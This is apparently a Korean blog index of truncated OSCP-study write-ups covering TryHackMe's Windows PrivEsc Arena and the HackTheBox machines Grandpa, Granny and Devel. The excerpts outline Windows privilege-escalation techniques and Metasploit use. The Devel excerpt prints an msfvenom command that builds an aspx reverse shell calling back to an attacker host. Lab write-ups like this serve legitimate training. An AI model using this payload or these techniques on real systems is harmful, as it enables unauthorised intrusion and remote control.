windows 3

[Windows] Windows PrivEsc Arena

Windows PrivEsc Arena tryhackme.com/room/windowsprivescarena - 원인에 대한 분석이나 구체적 설명이 없음... - 정말 실습용, 나중에 winPEAS 결과물 보고 참고하는 것이 좋을 듯 Registry Escalation - Autorun Registry Escalation - AlwaysInstallElevated Service Escalation - Registry Privilege Escalation - Startup Applications Service Escalation - DLL Hijacking Service Escalation - binPath Service Escalation - Unquoted Service Paths Potato Esca..

OSCP/TryHackMe 2020.06.14

[Windows] Grandpa & Granny

Grandpa & Granny - webdav를 이용한 Exploit - 단순히 메타스플로잇 사용하는 연습장 - 그래서 사용자들의 Rating이 낮은 듯.. local exploit 전에.. 1. 프로세스 migrate 2. temp폴더 이동 3. 미터프리터로 리버스 페이로드 설정(OSCP대비하려면 netcat) 4. 페이로드에 따라 쉘 반응 무응답일 수 있음 또는 서버 응답오류.. > unstaged vs staged 낮은 권한으로 쉘에 접근되기 때문에 프로세스중 migrate를 사용해 더 높은 권한유저로 변경해야 함 whoami로 봤을때는 NT...Network service로 나오지만 낮은 권한 사용자라 getuid등 명령어 해석이 안됨, getuid returns the real user ID o..

OSCP/HackTheBox 2020.05.25

[Windows] Devel

Devel * 웹에서 venom 쉘이 실행되도록 was가 실행가능한 포멧으로 페이로드를 생성하여 업로드. Armed with the ability to upload files, it is possible to drop an aspx reverse shell on the target and execute it by browsing to the file via the web server. The following command will create the aspx file: msfvenom -p windows/meterpreter/reverse_tcp LHOST=호스트 LPORT=포트 -f aspx > devel.aspx 다음과 같이 curl을 사용하여 콘솔에서 트리거 할 수 있음 curl -g 10.10...

OSCP/HackTheBox 2020.05.19